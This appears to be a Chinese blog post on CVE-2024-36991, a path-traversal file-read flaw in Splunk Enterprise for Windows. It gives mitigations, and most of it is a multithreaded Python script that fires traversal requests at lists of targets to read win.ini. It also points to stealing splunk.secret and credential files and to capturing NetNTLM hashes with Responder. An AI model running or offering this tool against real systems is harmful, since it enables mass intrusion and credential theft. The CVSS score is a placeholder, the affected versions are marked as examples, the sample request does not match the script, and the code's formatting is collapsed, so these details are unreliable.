#渗透测试#批量漏洞挖掘#Splunk Enterprise for Windows 任意文件读取漏洞（ CVE-2024-36991）

免责声明 本教程仅为合法的教学目的而准备，严禁用于任何形式的违法犯罪活动及其他商业行为，在使用本教程前，您应确保该行为符合当地的法律法规，继续阅读即表示您需自行承担所有操作的后果，如有异议，请立即停止本文章读。

目录

一、漏洞概述

二、技术原理分析

三、受影响版本

四、修复建议

五、验证方法

六、漏洞拓展影响

七、漏洞检测脚本

一、漏洞概述

• CVE编号：CVE-2024-36991
• 漏洞类型：任意文件读取 (Arbitrary File Read)
• 影响组件：Splunk Enterprise for Windows版本的Web接口
• CVSS评分：[需参考NVD/NIST官方评分，典型文件读取漏洞通常在7.0-8.0间]

二、技术原理分析

1. 根本原因
   路径遍历漏洞，攻击者通过构造恶意请求绕过路径访问限制，利用Windows文件系统特性读取未授权文件。例如：

GET /splunkd/__raw/servicesNS/-/-/debug/file?path=C:\Windows\system32\drivers\etc\hosts HTTP/1.1

1. 服务端未对path参数进行规范化处理，导致可读取系统文件。

2. 利用条件

   • 攻击者需具备低权限账户或利用未认证接口（视具体漏洞而定）
   • 目标系统运行Windows平台下的受影响Splunk版本

三、受影响版本

根据Splunk安全公告，确认受影响版本（示例）：

• Splunk Enterprise 9.0.x（Windows版，低于9.0.5）
• Splunk Enterprise 8.2.x（Windows版，低于8.2.11）

四、修复建议

1. 官方补丁升级

# 检查当前Splunk版本
& "$SPLUNK_HOME\bin\splunk" --version# 下载对应版本的安全更新包
# 例如9.0.x系列的修复版本为9.0.5

临时缓解措施（如无法立即升级）：

• 在网络层限制对Splunk Web接口(默认8000端口)的访问范围
• 启用Splunk内置的访问控制策略，严格限制API接口权限
• 监控异常文件访问日志：

index=_internal source=*web_service.log  uri=*file* (status=200 OR status=403) 
| stats count by clientip, path

五、验证方法

通过查询系统注册表确认补丁生效：

# Windows系统查看Splunk安装版本
Get-ItemProperty HKLM:\Software\Wow6432Node\SplunkInstaller | Select SplunkVersion

六、漏洞拓展影响

可能被利用组合攻击的场景：

1. 读取$SPLUNK_HOME\etc\passwd获取加密凭据
2. 窃取c:\ProgramData\Splunk\etc\auth\splunk.secret 密钥文件
3. 横向移动获取NetNTLM哈希（需配合Responder工具）

建议企业用户优先在安全测试环境验证修复方案，并同步检查所有Splunk节点（包括Search Head/Indexer/Forwarder）的版本一致性。

七、漏洞检测脚本

#!/usr/bin/env python3 
"""
Splunk Enterprise for Windows 任意文件读取漏洞检测工具（优化版）
功能增强：
1. 支持多线程批量检测 
2. 增加HTTPS协议优先级 
3. 添加结果保存功能 
4. 改进漏洞特征检测 
5. 支持代理配置 
"""import argparse 
import requests 
import sys 
import os 
from concurrent.futures  import ThreadPoolExecutor, as_completed 
from urllib3.exceptions  import InsecureRequestWarning # 禁用SSL警告 
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) # 颜色配置 
COLOR_CONFIG = {'RED': '\033[91m','GREEN': '\033[92m','YELLOW': '\033[93m','RESET': '\033[0m'
}# 漏洞检测配置 
DETECTION_CONFIG = {'timeout': 15,'max_redirects': 0,'vuln_signatures': ['[fonts]', '[extensions]', 'file://'],'path_traversal_depth': 10,  # 目录遍历层级 'default_ports': [8000, 8080, 443]  # 默认尝试端口 
}def color_print(text, color=None):"""彩色输出封装"""if color and COLOR_CONFIG.get(color.upper()): return f"{COLOR_CONFIG[color.upper()]}{text}{COLOR_CONFIG['RESET']}"return text def construct_url(base_url):"""智能处理URL格式"""base_url = base_url.strip() if not base_url.startswith(('http://',  'https://')):for port in DETECTION_CONFIG['default_ports']:if f':{port}' in base_url:return f'https://{base_url}'return f'http://{base_url}'return base_url def check_file_read(target_url, proxies=None, timeout=None):"""执行漏洞检测核心逻辑"""headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36','Accept-Encoding': 'gzip, deflate'}# 动态构造路径遍历 traversal_path = '/C:%2e%2e' * DETECTION_CONFIG['path_traversal_depth']exploit_url = f"{target_url.rstrip('/')}/en-US/modules/messaging{traversal_path}/windows/win.ini" try:response = requests.get( exploit_url,headers=headers,verify=False,timeout=timeout or DETECTION_CONFIG['timeout'],allow_redirects=DETECTION_CONFIG['max_redirects'],proxies=proxies )# 增强特征检测 vuln_detected = all(sig in response.text  for sig in DETECTION_CONFIG['vuln_signatures']) if response.status_code  == 200 else False return {'url': target_url,'status': 'VULNERABLE' if vuln_detected else 'SAFE','status_code': response.status_code, 'content_length': len(response.text), 'response_sample': response.text[:100] }except requests.RequestException as e:return {'url': target_url,'error': str(e)}def process_results(results, output_file=None):"""处理并输出检测结果"""for result in results:if 'error' in result:print(f"{color_print('[!]', 'YELLOW')} {result['url']} 检测失败: {result['error']}")continue status_msg = color_print('[+] 存在漏洞', 'RED') if result['status'] == 'VULNERABLE' else '[-] 未检测到漏洞'info_msg = f"状态码: {result['status_code']} | 响应长度: {result['content_length']} | 响应摘要: {result['response_sample']}"print(f"{status_msg} - {result['url']}\n   {info_msg}")if output_file:with open(output_file, 'a') as f:f.write(f"{result['url']},{result['status']}\n") def main():parser = argparse.ArgumentParser(description='Splunk Enterprise 任意文件读取漏洞检测工具')parser.add_argument('-u',  '--url', help='单个目标URL')parser.add_argument('-f',  '--file', help='包含多个URL的文件')parser.add_argument('-t',  '--threads', type=int, default=5, help='并发线程数 (默认: 5)')parser.add_argument('-o',  '--output', help='结果输出文件')parser.add_argument('--timeout',  type=int, default=15, help='请求超时时间 (默认: 15秒)')parser.add_argument('--proxy',  help='使用代理 (示例: http://127.0.0.1:8080)')args = parser.parse_args() # 参数校验 if not args.url  and not args.file: parser.error(' 必须指定 -u/--url 或 -f/--file 参数')# 配置代理 proxies = {'http': args.proxy,  'https': args.proxy}  if args.proxy  else None # 准备目标列表 targets = []if args.url: targets.append(construct_url(args.url)) if args.file: if not os.path.exists(args.file): sys.exit(color_print(f" 错误: 文件 {args.file}  不存在", 'RED'))with open(args.file,  'r') as f:targets.extend([construct_url(line)  for line in f if line.strip()  and not line.startswith('#')]) # 执行并发检测 results = []with ThreadPoolExecutor(max_workers=args.threads)  as executor:futures = {executor.submit(check_file_read,  url, proxies, args.timeout):  url for url in targets}for future in as_completed(futures):results.append(future.result()) # 处理结果输出 process_results(results, args.output) if __name__ == '__main__':main()